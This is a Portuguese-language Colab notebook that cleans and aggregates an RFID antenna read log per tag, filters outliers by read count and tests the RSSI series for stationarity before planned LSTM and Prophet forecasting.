# Truncate printed NumPy arrays to at most 11 elements so previews stay short.
np.set_printoptions(threshold=11)
# + id="l7gb7Ba4IDx-" colab={"base_uri": "https://localhost:8080/"} executionInfo={"status": "ok", "timestamp": 1607186284067, "user_tz": 180, "elapsed": 32542, "user": {"displayName": "Manuel Rodrigues", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GjulwoacYbOKa_cWHHnWza7N7FIal8P0oxUERh59w=s64", "userId": "00973487492077262858"}} outputId="938465b4-2ab0-4a0b-c61d-d8ddc97bb6b1"
# Mount the user's Google Drive folder tree so the dataset stored there
# becomes reachable under /content/gdrive (Colab-only; prompts for auth).
from google.colab import drive
drive.mount('/content/gdrive')
# + id="7qG3YREaphpI" colab={"base_uri": "https://localhost:8080/"} executionInfo={"status": "ok", "timestamp": 1607186355690, "user_tz": 180, "elapsed": 1010, "user": {"displayName": "Manuel Rodrigues", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GjulwoacYbOKa_cWHHnWza7N7FIal8P0oxUERh59w=s64", "userId": "00973487492077262858"}} outputId="97cb651b-6440-4b9b-d7fa-915d442e1703"
# cd gdrive/My Drive/TCC
# + [markdown] id="Ixnw_K-Ithzw"
# ### Limpeza e Transformação do Log
# + [markdown] id="PNkEe4vHHhKO"
# Carregamento dos dados, arquivo de log esta separado por vírgula, e seus valores estão com "sujeira" e precisam ser tratados posteriormente
# + id="seMk3XmhHhKP" colab={"base_uri": "https://localhost:8080/", "height": 221} executionInfo={"status": "ok", "timestamp": 1607186402247, "user_tz": 180, "elapsed": 8534, "user": {"displayName": "Manuel Rodrigues", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GjulwoacYbOKa_cWHHnWza7N7FIal8P0oxUERh59w=s64", "userId": "00973487492077262858"}} outputId="b05d9b05-9dfc-4deb-83cb-bbf6096a1b9e"
# Load the raw reader log (comma separated). Values still carry "KEY=" prefixes
# and non-read lines; both are cleaned up in the following steps.
dfTemp = pd.read_csv('Dataset/DeviceReader.txt', names=['EPC', 'ANTENNA', 'RSSI', 'TIMESTAMP'], sep=',')
print ('Linhas: ', dfTemp.shape[0])
dfTemp.head()
# + id="UYfWh6oNHhKR" colab={"base_uri": "https://localhost:8080/", "height": 204} executionInfo={"status": "ok", "timestamp": 1607186407626, "user_tz": 180, "elapsed": 996, "user": {"displayName": "Manuel Rodrigues", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GjulwoacYbOKa_cWHHnWza7N7FIal8P0oxUERh59w=s64", "userId": "00973487492077262858"}} outputId="fcf82b6d-11e4-416a-9d6e-eadf153cfff3"
dfTemp.tail(5)
# + [markdown] id="g2Hc1gf2tqKo"
# #### 1ª Etapa
# + [markdown] id="p4NZ0nYlHhKU"
# A EPC é uma tag de evento de leitura de antena RFID, que registra cada leitura de maneira sequêncial, sendo que cada tag é única.
#
# Para a preparação do banco de dados, a primeira etapa a ser realizada é separar a EPC do restante da string, podendo saber assim a tag de cada leitura.
# + id="8vCzCIdEHhKU" colab={"base_uri": "https://localhost:8080/", "height": 221} executionInfo={"status": "ok", "timestamp": 1607186443188, "user_tz": 180, "elapsed": 8563, "user": {"displayName": "Manuel Rodrigues", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GjulwoacYbOKa_cWHHnWza7N7FIal8P0oxUERh59w=s64", "userId": "00973487492077262858"}} outputId="020567ef-3810-4687-e201-316b4e21a045"
# Split the first raw field "HH:MM:SS.mmm;payload" into TIME and EPC.
# str.split(..., expand=True) replaces the deprecated `.str` tuple-unpack idiom
# (`a, b = s.str.split(...).str`), which newer pandas versions no longer support.
dfTemp[['TIME', 'EPC']] = dfTemp['EPC'].str.split(';', n=1, expand=True)
print ('Linhas: ', dfTemp.shape[0])
dfTemp.head(5)
# + [markdown] id="_vASChCyt6Hl"
# #### 2ª Etapa
# + [markdown] id="fuxcQSGVHhKW"
# No log registrado pelo equipamento, quando uma leitura é validada pelo sistema, uma string é iniciada com "RFIDValidation". O valor da potência de resposta (RSSI) é adotado como o valor da próxima string.
#
# A segunda etapa de preparação do banco de dados é criar uma coluna VALIDATION, sendo que quando houver um valor de potência de resposta adotado (RSSI), o valor de VALIDATION deverá ser 1.
# + id="LhYVqiirHhKW" colab={"base_uri": "https://localhost:8080/", "height": 1000} executionInfo={"status": "ok", "timestamp": 1607186452772, "user_tz": 180, "elapsed": 3690, "user": {"displayName": "Manuel Rodrigues", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GjulwoacYbOKa_cWHHnWza7N7FIal8P0oxUERh59w=s64", "userId": "00973487492077262858"}} outputId="0ed8577c-9d40-44bf-8167-b5302bf321e1"
# Flag validation events: a line containing "RFIDValidation" means the NEXT log
# line carries the RSSI adopted at validation time, so the flag is shifted down
# one row onto that following line.
dfTemp['VALIDATION'] = 0
dfTemp.loc[dfTemp['EPC'].str.contains("RFIDValidation"), 'VALIDATION'] = 1
dfTemp['VALIDATION'] = dfTemp['VALIDATION'].shift()  # move the flag to the following row
dfTemp.dropna(inplace=True)  # drops rows left with NaN (at least the first row after the shift)
print ('Linhas: ', dfTemp.shape[0])
dfTemp.head(40)
# + [markdown] id="fBLnQsw6uUJl"
# #### 3ª Etapa
# + [markdown] id="jyU9qQh3HhKY"
# A etapa seguinte de preparação do banco de dados consiste e manter apenas os logs que contenham a substring "TAG=", eliminando assim os demais casos
# + id="bOyNv9ZZHhKZ" colab={"base_uri": "https://localhost:8080/", "height": 221} executionInfo={"status": "ok", "timestamp": 1607186467168, "user_tz": 180, "elapsed": 2271, "user": {"displayName": "Manuel Rodrigues", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GjulwoacYbOKa_cWHHnWza7N7FIal8P0oxUERh59w=s64", "userId": "00973487492077262858"}} outputId="d50d18e7-470f-4cac-e0b1-27ac891c6898"
# Keep only the actual tag-read lines (those containing "TAG="); discard the rest.
dfTemp = dfTemp[dfTemp['EPC'].str.contains("TAG=")]
print ('Linhas: ', dfTemp.shape[0])
dfTemp.head(5)
# + [markdown] id="HT1tIueMuhlm"
# #### 4ª Etapa
# + [markdown] id="2qnhypEnHhKb"
# Nesta etapa, foram removidos os marcadores específicos de cada coluna, mantendo apenas os respectivos valores.
# + id="HzBfBY5pHhKc" colab={"base_uri": "https://localhost:8080/", "height": 221} executionInfo={"status": "ok", "timestamp": 1607186484945, "user_tz": 180, "elapsed": 7497, "user": {"displayName": "Manuel Rodrigues", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GjulwoacYbOKa_cWHHnWza7N7FIal8P0oxUERh59w=s64", "userId": "00973487492077262858"}} outputId="d6181439-ffae-4ab9-c2e1-1685a6b19d80"
# Strip the "KEY=" markers, leaving only the bare values in each column.
dfTemp['EPC'] = dfTemp['EPC'].str.replace('TAG=', '')
dfTemp['RSSI'] = dfTemp['RSSI'].str.replace('RSSI=', '')
dfTemp['TIMESTAMP'] = dfTemp['TIMESTAMP'].str.replace('TIMESTAMP=', '')
print ('Linhas: ', dfTemp.shape[0])
dfTemp.head(5)
# + [markdown] id="cNrvqsJjvJFL"
# #### 5ª Etapa
# + [markdown] id="HerqOANNHhKe"
# Finalizando o primeiro processo de transformação, um novo dataset foi criado para melhorar a visualização: a ordem das colunas foi corrigida, as colunas desnecessárias foram excluídas e os tipos das colunas foram atualizados para facilitar o trabalho posterior com os dados. Por fim, o índice de linhas foi reiniciado e o resultado foi salvo.
# + id="ysNznNOsHhKf" colab={"base_uri": "https://localhost:8080/", "height": 408} executionInfo={"status": "ok", "timestamp": 1607186494693, "user_tz": 180, "elapsed": 980, "user": {"displayName": "Manuel Rodrigues", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GjulwoacYbOKa_cWHHnWza7N7FIal8P0oxUERh59w=s64", "userId": "00973487492077262858"}} outputId="74fbd576-4e15-4cfe-bc8b-a51560766cdd"
# New frame with only the columns of interest, in reading order
# (TIME and ANTENNA are dropped here).
df = dfTemp[['TIMESTAMP','EPC','RSSI','VALIDATION']]
print(df.info())
df.head(5)
# + id="FW-J7DuVHhKi" colab={"base_uri": "https://localhost:8080/"} executionInfo={"status": "ok", "timestamp": 1607186504606, "user_tz": 180, "elapsed": 3258, "user": {"displayName": "Manuel Rodrigues", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GjulwoacYbOKa_cWHHnWza7N7FIal8P0oxUERh59w=s64", "userId": "00973487492077262858"}} outputId="9f44cd65-f078-47cf-eb86-3c1a31346a67"
# Cast the columns to proper numeric types for the later aggregations.
df['TIMESTAMP'] = pd.to_numeric(df['TIMESTAMP'])
df['RSSI'] = pd.to_numeric(df['RSSI'])
df['VALIDATION'] = df['VALIDATION'].astype(int)
df.info()
# + id="CwlqhhpBHhKk" colab={"base_uri": "https://localhost:8080/", "height": 221} executionInfo={"status": "ok", "timestamp": 1607186512086, "user_tz": 180, "elapsed": 1003, "user": {"displayName": "Manuel Rodrigues", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GjulwoacYbOKa_cWHHnWza7N7FIal8P0oxUERh59w=s64", "userId": "00973487492077262858"}} outputId="2a0661f9-6dd2-4dbe-d48d-027a5399e765"
# Renumber the rows from 0. The original called reset_index without assigning
# the result, so the old raw-log line numbers were silently kept as the index.
df = df.reset_index(drop=True)
print ('Linhas: ', df.shape[0])
df.head(5)
# + [markdown] id="Vq879qxeHhKm"
# Salvarei os dados em um novo arquivo para não precisar refazer esses passos novamente.
# + id="i359FvZJHhKm" executionInfo={"status": "ok", "timestamp": 1607186626035, "user_tz": 180, "elapsed": 9484, "user": {"displayName": "Manuel Rodrigues", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GjulwoacYbOKa_cWHHnWza7N7FIal8P0oxUERh59w=s64", "userId": "00973487492077262858"}}
df.to_csv('Dataset/Output.csv')
# + [markdown] id="xuLSCFBEvWi5"
# ### Agrupamento dos Dados
# + [markdown] id="lD1ZmGbjHhKo"
# Nessa segunda fase do pré-processamento a idéia é fazer um agrupamento dos dados por EPC e identificar os valores de RSSI máximo (que determina o melhor momento de validação), Mínimo (que identifica o valor da pior leitura), Médio (que determina a média das leituras por EPC), Contagem (para identificar quantas vezes aquele EPC foi capturado pela antena), Valor de Validação (que será o valor do RSSI onde o sistema considerou como item válido) e o Timestamp (valor do momento que a leitura aconteceu).
#
# O timestamp será o índice desse dataset agrupado e será importante dado para o modelo de série temporal que será utilizado para prever as próximas leituras.
# + [markdown] id="i1SMYXf-HhKp"
# Iniciarei com o carregamente do Dataset.
# + id="_5ID9bldHhKq" colab={"base_uri": "https://localhost:8080/", "height": 221} executionInfo={"status": "ok", "timestamp": 1607186643171, "user_tz": 180, "elapsed": 2984, "user": {"displayName": "Manuel Rodrigues", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GjulwoacYbOKa_cWHHnWza7N7FIal8P0oxUERh59w=s64", "userId": "00973487492077262858"}} outputId="035c5048-d5d3-4aff-be07-92547a1dd0ed"
# Reload the cleaned per-read log produced by the pre-processing phase.
df = pd.read_csv('Dataset/Output.csv', index_col=0)
print ("Tamanho Original (Linhas x Colunas): ", df.shape)
df.head()
# + [markdown] id="IMql_G2uwOTf"
# #### 1ª Etapa
# + [markdown] id="kGTdg3EfHhKs"
# Para facilitar a captura dos valores que precisarei vou atualizar o valor do Campo VALIDATION com o valor do RSSI correspondente.
# Com isso conseguirei pegar qual foi o RSSI no momento da validação.
# + id="qYJC47pRHhKt" executionInfo={"status": "ok", "timestamp": 1607186650528, "user_tz": 180, "elapsed": 997, "user": {"displayName": "Manuel Rodrigues", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GjulwoacYbOKa_cWHHnWza7N7FIal8P0oxUERh59w=s64", "userId": "00973487492077262858"}}
df['VALIDATION'] = df.RSSI[df['VALIDATION']==1]
# + [markdown] id="_NwIPbh97Emp"
# #### 2ª Etapa
# + [markdown] id="uePreYIhHhKv"
# O agrupamento pelo EPC pegando os valores MIN, MAX, MEAN e COUNT.
#
# O valor MIN é importante pois representa para aquele EPC qual foi a pior leitura dentre todas as leituras feitas. Como a leitura é feita em movimento, os EPCs terão uma leitura ruim enquanto estiver afastado da antena.
#
# O valor MAX representa o ponto de melhor leitura do EPC, ou seja, o ponto onde ele esta posicionado bem acima da antena. Esse normalmente é a melhor posição para validação de leitura e é através dele que se estipula o valor limite para validação do sistema que controla essas leituras e considera a TAG como boa ou ruim.
#
# O valor MEAN (média) é o valor médio entre as leituras feitas para cada EPC em relação a quantidade de leituras feitas.
#
# O COUNT representa quantas leituras a antena recebeu da TAG. Ele servirá de filtro para remoção de outliers. Por exemplo, as vezes, a máquina pode parar por problema mecânico e nesse caso a antena fará muitas leituras das TAGs que estiverem próximas. Mas como a máquina esta parada, essas leituras não são válidas para analise e estudo do comportamento e previsão.
# + [markdown] id="V_PDw-E97PNL"
# Será criado um novo dataset temporário contemplando esse agrupamento.
# + id="9SQ7S-eDHhKw" colab={"base_uri": "https://localhost:8080/", "height": 252} executionInfo={"status": "ok", "timestamp": 1607186661224, "user_tz": 180, "elapsed": 1509, "user": {"displayName": "Manuel Rodrigues", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GjulwoacYbOKa_cWHHnWza7N7FIal8P0oxUERh59w=s64", "userId": "00973487492077262858"}} outputId="c96b33b8-2cfa-4a86-9f2e-b1457c9299aa"
# Aggregate the RSSI readings per tag (EPC): worst, best, average and read count.
df1 = df.groupby(['EPC'])['RSSI'].agg(['min','max','mean','count'])
print (df1.shape)
df1.head()
# + [markdown] id="ksbzmVLD7auL"
# #### 3ª Etapa
# + [markdown] id="rCNKYlMyHhKx"
# Foi escolhido como data (timestamp) o tempo da primeira leitura recebida pela antena de cada EPC. E um novo dataset será criado contendo essa informação.
# + id="Goo20uAvHhKy" colab={"base_uri": "https://localhost:8080/"} executionInfo={"status": "ok", "timestamp": 1607186669595, "user_tz": 180, "elapsed": 1314, "user": {"displayName": "Manuel Rodrigues", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GjulwoacYbOKa_cWHHnWza7N7FIal8P0oxUERh59w=s64", "userId": "00973487492077262858"}} outputId="77ed94e5-523f-4521-be06-683b63694c46"
# Timestamp of the FIRST read of each EPC; used later as the series index.
df2 = df.groupby(['EPC'])['TIMESTAMP'].min()
print (df2.shape)
df2.head()
# + [markdown] id="ibS4s1QZ7ojD"
# #### 4ª Etapa
# + [markdown] id="BuXDbIj9HhK0"
# Para cada EPC foi salvo o valor do RSSI do momento que o sistema validou a TAG. Esse valor é importante, pois serve como base de estudo do quão distante do valor MAX (melhor ponto de validação) ele está. Hoje ele é utilizado para ajustes de posicionamento de antena e configuração de filtro de validação.
#
# Quanto mais próximo do valor MAX, mais ideal estará a configuração (setup) da máquina.
#
# Um terceiro dataset temporário foi criado para armazenar essa informação.
# + id="DCMpyZN1HhK1" colab={"base_uri": "https://localhost:8080/"} executionInfo={"status": "ok", "timestamp": 1607186681293, "user_tz": 180, "elapsed": 848, "user": {"displayName": "Manuel Rodrigues", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GjulwoacYbOKa_cWHHnWza7N7FIal8P0oxUERh59w=s64", "userId": "00973487492077262858"}} outputId="cff9077e-e08b-4aff-bcc2-d6c775697b91"
# RSSI adopted when the system validated each tag; max() collapses the single
# non-NaN VALIDATION value per EPC (NaNs are ignored by the aggregation).
df3 = df.groupby(['EPC'])['VALIDATION'].max()
print (df3.shape)
df3.head()
# + [markdown] id="wrr6cASQ8GeJ"
# #### 5ª Etapa
#
# + [markdown] id="uFaN06XfHhK2"
# Por fim, todas essas colunas foram concatenadas, nomes alterados, e definido o Timestamp como indice. Um novo arquivo de saída foi gerado para facilitar nas etapas posteriores.
# + id="6Axn6gkqHhK3" colab={"base_uri": "https://localhost:8080/", "height": 252} executionInfo={"status": "ok", "timestamp": 1607186690977, "user_tz": 180, "elapsed": 907, "user": {"displayName": "Manuel Rodrigues", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GjulwoacYbOKa_cWHHnWza7N7FIal8P0oxUERh59w=s64", "userId": "00973487492077262858"}} outputId="9484ff05-1628-4c7d-bcee-52ad7748e5d3"
# Join first-read timestamp, validation RSSI and the per-EPC aggregates.
df_final = pd.concat([df2, df3, df1], axis=1)
print (df_final.shape)
df_final.head()
# + id="OKTmVC6ZHhK4" colab={"base_uri": "https://localhost:8080/", "height": 235} executionInfo={"status": "ok", "timestamp": 1607186695940, "user_tz": 180, "elapsed": 1167, "user": {"displayName": "Manuel Rodrigues", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GjulwoacYbOKa_cWHHnWza7N7FIal8P0oxUERh59w=s64", "userId": "00973487492077262858"}} outputId="173edec4-acc3-4646-8602-372d39089f09"
# Use TIMESTAMP as the index and give the aggregate columns uppercase names.
df_final = df_final.reset_index()
df_final = df_final.set_index(['TIMESTAMP'], drop=True)
df_final = df_final.rename(columns={"min": "MIN", "max": "MAX", "mean":"MEAN", "count":"COUNT"})
df_final.head()
# + id="El4cEcI-HhK6" executionInfo={"status": "ok", "timestamp": 1607186701505, "user_tz": 180, "elapsed": 1061, "user": {"displayName": "Manuel Rodrigues", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GjulwoacYbOKa_cWHHnWza7N7FIal8P0oxUERh59w=s64", "userId": "00973487492077262858"}}
df_final.to_csv('Dataset/GroupOutput.csv')
# + [markdown] id="3rrTI-aP8c5P"
# ### Análise para Remoção de Outliers
# + [markdown] id="UodX_2HXHhK8"
# Agora, faremos algumas análises no dataset resultante para definir a melhor estratégia de separação dos dados e remoção de outliers.
#
# Iniciando pelo carregamento dos dados salvos.
# + id="0_t4cm5UHhK8" colab={"base_uri": "https://localhost:8080/", "height": 235} executionInfo={"status": "ok", "timestamp": 1607186717882, "user_tz": 180, "elapsed": 1018, "user": {"displayName": "Manuel Rodrigues", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GjulwoacYbOKa_cWHHnWza7N7FIal8P0oxUERh59w=s64", "userId": "00973487492077262858"}} outputId="38b9ce9f-9523-437f-e810-c8dced48778b"
# Reload the grouped dataset for the outlier analysis.
df_final = pd.read_csv('Dataset/GroupOutput.csv', index_col=0)
df_final.head(5)
# + id="ZREocnPVHhK-" colab={"base_uri": "https://localhost:8080/", "height": 204} executionInfo={"status": "ok", "timestamp": 1607186721865, "user_tz": 180, "elapsed": 999, "user": {"displayName": "Manuel Rodrigues", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GjulwoacYbOKa_cWHHnWza7N7FIal8P0oxUERh59w=s64", "userId": "00973487492077262858"}} outputId="f500d287-c917-422b-8b6f-229fc78ec286"
# Back to a plain RangeIndex (TIMESTAMP becomes a regular column again).
df_final = df_final.reset_index()
df_final.head()
# + [markdown] id="mvDeXT3-85WS"
# Observando a análise estatística dos dados abaixo, percebe-se que existem itens (EPCs) que fizeram uma quantidade muito grande de leituras, muito acima da média que é de 53.8 leituras. Isso se caracteriza por momentos em que talvez a máquina tenha ficado parada com a TAG posicionada em cima da antena, que continuou capturando valores da mesma TAG.
# + id="2GFskcRCHhLA" colab={"base_uri": "https://localhost:8080/", "height": 297} executionInfo={"status": "ok", "timestamp": 1607186725844, "user_tz": 180, "elapsed": 1007, "user": {"displayName": "Manuel Rodrigues", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GjulwoacYbOKa_cWHHnWza7N7FIal8P0oxUERh59w=s64", "userId": "00973487492077262858"}} outputId="19169b45-dbdb-4ecd-cf33-f2028564551f"
df_final.describe()
# + [markdown] id="58SzXLM29kFy"
# A estratégia utilizada para remoção desses itens é manter no dataset apenas os itens cuja contagem for menor ou igual a 60. Esse valor foi escolhido, pois a maior parte dos dados se encontram próximos a esse valor o que demonstra que é um bom parâmetro de leitura da antena.
# + id="28Yu0pVRHhLB" colab={"base_uri": "https://localhost:8080/"} executionInfo={"status": "ok", "timestamp": 1607186732109, "user_tz": 180, "elapsed": 1348, "user": {"displayName": "Manuel Rodrigues", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GjulwoacYbOKa_cWHHnWza7N7FIal8P0oxUERh59w=s64", "userId": "00973487492077262858"}} outputId="02c3bcf3-37c9-485b-9a91-f5c4e0dbe0fe"
# Keep only items with at most 60 antenna reads, removing the stalled-belt
# outliers discussed above. The explicit .copy() makes df_filtered an
# independent frame so the in-place dropna below does not operate on a view
# of df_final (pandas' SettingWithCopyWarning).
df_filtered = df_final[(df_final['COUNT']<=60)].copy()
print ("Tamanho Final (Linhas x Colunas): ", df_filtered.shape)
df_filtered.dropna(inplace=True)
# + [markdown] id="6qEcqhCR-atp"
# O novo resultado estatístico do dataset demonstrado abaixo, mostra que os dados agrupados de cada item tem um padrão coerente com os valores coletados da antena para cada item.
#
# Propositalmente foi decidido manter os itens com contagem baixa, como exemplo o item cujo minimo foi 4. Isso porque ao analisar o log, tratava-se de um item que foi aprovado pelo sistema. Esse tipo de comportamente é comum acontecer, apesar de fugir de um padrão de comportamento de leituras boas.
# + id="H7g6m86V-_Dv" colab={"base_uri": "https://localhost:8080/", "height": 297} executionInfo={"status": "ok", "timestamp": 1607186743366, "user_tz": 180, "elapsed": 976, "user": {"displayName": "Manuel Rodrigues", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GjulwoacYbOKa_cWHHnWza7N7FIal8P0oxUERh59w=s64", "userId": "00973487492077262858"}} outputId="2affef35-6428-465d-ae12-ea47d5f733cc"
df_filtered.describe()
# + [markdown] id="98I5G007_sPs"
# # Testes Estatísticos - Séries Estacionárias
# + [markdown] id="7v5E81r3BDne"
# ### Plot do Gráfico
# + id="jh52nSBEHhLG" executionInfo={"status": "ok", "timestamp": 1607186751839, "user_tz": 180, "elapsed": 721, "user": {"displayName": "Manuel Rodrigues", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GjulwoacYbOKa_cWHHnWza7N7FIal8P0oxUERh59w=s64", "userId": "00973487492077262858"}}
import matplotlib.pyplot as plt
# + [markdown] id="2MpBuIA9BMBh"
# Foi escolhido apenas uma fatia de 200 itens do dataset para melhor visualizar a série.
# + id="TmyB2M-VHhLJ" colab={"base_uri": "https://localhost:8080/", "height": 621} executionInfo={"status": "ok", "timestamp": 1607186754050, "user_tz": 180, "elapsed": 2919, "user": {"displayName": "Manuel Rodrigues", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GjulwoacYbOKa_cWHHnWza7N7FIal8P0oxUERh59w=s64", "userId": "00973487492077262858"}} outputId="3d4f2f3e-6d22-496c-b007-afe9f959d9ec"
# Plot a 200-item slice: RSSI aggregates on top, read counts below.
plt.figure(figsize=(25,10))
ax1 = plt.subplot(211)
plt.plot(df_filtered.iloc[10000:10200, 2:6])  # columns VALIDATION, MIN, MAX, MEAN
plt.ylabel('RSSI')
plt.title('Valores dos Agrupamentos do RSSI')
plt.setp(ax1.get_xticklabels(), visible=False)  # x labels only on the bottom panel
plt.legend(df_filtered.columns[2:6])
ax2 = plt.subplot(212)
plt.plot(df_filtered.iloc[10000:10200, 6:7])  # COUNT column
plt.ylabel('COUNT')
plt.xlabel('TIMESTAMP')
plt.title('Contagem')
plt.legend(df_filtered.columns[6:7])
plt.show()
# + [markdown] id="dkcS0v2qBmNY"
# ### Decomposição da Série Temporal
# + id="f-gGPrBuHhLL" executionInfo={"status": "ok", "timestamp": 1607186754388, "user_tz": 180, "elapsed": 3250, "user": {"displayName": "Manuel Rodrigues", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GjulwoacYbOKa_cWHHnWza7N7FIal8P0oxUERh59w=s64", "userId": "00973487492077262858"}}
from statsmodels.tsa.seasonal import seasonal_decompose
# + [markdown] id="eaxmcgGmbXFc"
# #### *VALIDATION, MIN, MAX, MEAN*
# + id="ngBsjCW5HhLN" colab={"base_uri": "https://localhost:8080/", "height": 639} executionInfo={"status": "ok", "timestamp": 1607186756005, "user_tz": 180, "elapsed": 4858, "user": {"displayName": "Manuel Rodrigues", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GjulwoacYbOKa_cWHHnWza7N7FIal8P0oxUERh59w=s64", "userId": "00973487492077262858"}} outputId="00478dc4-5ac2-4627-e216-25d467a6660a"
# Additive decomposition of the RSSI aggregates over a 200-item slice,
# assuming a period of 10 observations.
temp = seasonal_decompose(df_filtered.iloc[10000:10200, 2:6], model='additive', freq=10)
fig = temp.plot()
fig.set_size_inches(25,10)
# + [markdown] id="RuVJBz_Ybey1"
# #### *COUNT*
# + id="S6qtwvQ1z6X0" colab={"base_uri": "https://localhost:8080/", "height": 631} executionInfo={"status": "ok", "timestamp": 1607186757270, "user_tz": 180, "elapsed": 6116, "user": {"displayName": "Manuel Rodrigues", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GjulwoacYbOKa_cWHHnWza7N7FIal8P0oxUERh59w=s64", "userId": "00973487492077262858"}} outputId="910c43bf-3389-475d-ba57-1f956364359a"
# Same additive decomposition for COUNT, over a larger 1000-item slice.
temp = seasonal_decompose(df_filtered.iloc[10000:11000, 6:7], model='additive',freq=10)
fig = temp.plot()
fig.set_size_inches(25,10)
# + [markdown] id="q26RbAtD4OgP"
# Observando os dados acima, percebemos que os valores mantêm uma tendência estável sem viés de alta ou baixa; para um processo produtivo isso é um sinal muito bom, pois demonstra uma estabilidade das leituras.
#
# Sua sazonalidade é mínima variando apenas 1 ponto para quase todos os campos. Confirmando assim a estabilidade das leituras.
# + [markdown] id="tjYhLSV1B38U"
# ### Teste Estatístico Móveis (Média e Desvio Padrão)
# + id="vJP5EDHg-1t8" colab={"base_uri": "https://localhost:8080/", "height": 608} executionInfo={"status": "ok", "timestamp": 1607186760127, "user_tz": 180, "elapsed": 8967, "user": {"displayName": "Manuel Rodrigues", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GjulwoacYbOKa_cWHHnWza7N7FIal8P0oxUERh59w=s64", "userId": "00973487492077262858"}} outputId="ea084c65-d39e-4fca-c9a5-2cf57a73c2f5"
# Rolling mean / std over a 200-item window for each series, plotted per
# column to visually check stationarity (roughly flat lines suggest it).
timeseries = df_filtered[['VALIDATION','MIN','MAX','MEAN','COUNT']].copy()
rollingmean = timeseries.rolling(window=200).mean()
rollingstd = timeseries.rolling(window=200).std()
rollingmean.dropna(inplace=True)  # drop the first window-1 NaN rows
rollingstd.dropna(inplace=True)
plt.figure(figsize=(25,10))
for ix, col in enumerate(timeseries.columns):
    ax = plt.subplot(5,1,ix+1)
    plt.plot(timeseries[col], label='Original - ' + col)
    plt.plot(rollingmean[col], color='red', label='Média Móvel')
    plt.plot(rollingstd[col], color='black', label = 'Desvio Padrão Móvel')
    plt.legend(loc='best')
    plt.title('Média e Desvio Padrão Móveis - '+ col)
    plt.tick_params(labelbottom=False)  # hide x labels on every subplot...
plt.tick_params(labelbottom=True)  # ...then re-enable them on the last (current) axes
plt.show(block=False)
# + [markdown] id="V2Ljrp4cDCX7"
# Através dessa técnica podemos assumir visualmente que a série é estacionária pois sua média e desvio padrão se mantiveram praticamente constantes. Outro método que faremos a seguir é o teste estatístico de Dicky-Fuller.
# + [markdown] id="D42dhTUwRasn"
# ### Teste Estatístico Dickey-Fuller
# + id="_HwsBzfRSw1t" executionInfo={"status": "ok", "timestamp": 1607186760128, "user_tz": 180, "elapsed": 8966, "user": {"displayName": "Manuel Rodrigues", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GjulwoacYbOKa_cWHHnWza7N7FIal8P0oxUERh59w=s64", "userId": "00973487492077262858"}}
from statsmodels.tsa.stattools import adfuller
# + id="qq2bOkD_RlJb" colab={"base_uri": "https://localhost:8080/"} executionInfo={"status": "ok", "timestamp": 1607186795148, "user_tz": 180, "elapsed": 43980, "user": {"displayName": "Manuel Rodrigues", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GjulwoacYbOKa_cWHHnWza7N7FIal8P0oxUERh59w=s64", "userId": "00973487492077262858"}} outputId="4e2fcda4-5d3f-4445-83f5-235dfcc720b6"
# Run the ADF test per column. A test statistic below the critical values
# rejects the null hypothesis of a unit root (i.e. the series is stationary).
for ix, col in enumerate(timeseries.columns):
    print ('\nResultados do Teste Dickey-Fuller (%s)' % col)
    dftest = adfuller(timeseries[col], autolag='AIC')
    dfoutput = pd.Series(dftest[0:4], index=['Teste Estatístico','P-value','#Lags Usados','Num Observações'])
    for key, value in dftest[4].items():
        dfoutput['Valores Críticos (%s)' % key] = value  # critical values at 1%/5%/10%
    print (dfoutput)
# + [markdown] id="B2KFTScKWIkw"
# Os testes estatísticos de DF confirmam que a série é estacionária. Pois o Teste Estatístico foi menor que os valores críticos rejeitando a hipótese nula do teste de DF (Ho = Não Estacionária).
#
# Devido a isso nenhuma transformação será necessária na série.
# + id="WcuW9jye-66V" executionInfo={"status": "ok", "timestamp": 1607186795671, "user_tz": 180, "elapsed": 44502, "user": {"displayName": "Manuel Rodrigues", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GjulwoacYbOKa_cWHHnWza7N7FIal8P0oxUERh59w=s64", "userId": "00973487492077262858"}}
df_filtered.to_csv('Dataset/FinalOutput.csv')
# + [markdown] id="St8gBhgjbrTg"
# ## Modelos
# + [markdown] id="ouRnxXJRbra_"
# A ideia será utilizar o Dataset resultante para treinar um modelo onde como entrada usaremos uma abordagem Multivariada com os valores do passado dos campos VALIDATION, MIN, MAX, MEAN e COUNT para prever os valores futuros do VALIDATION.
#
# Também faremos uma abordagem Univariada com os valores do passado do campo VALIDATION para prever os valores futuros do próprio VALIDATION.
#
# Com isso foi escolhido 2 modelos LSTM (Long-Short Term Memory) do Keras e o Prophet do Facebook. Ambos modelos muito utilizados em problemas de séries temporais.
#
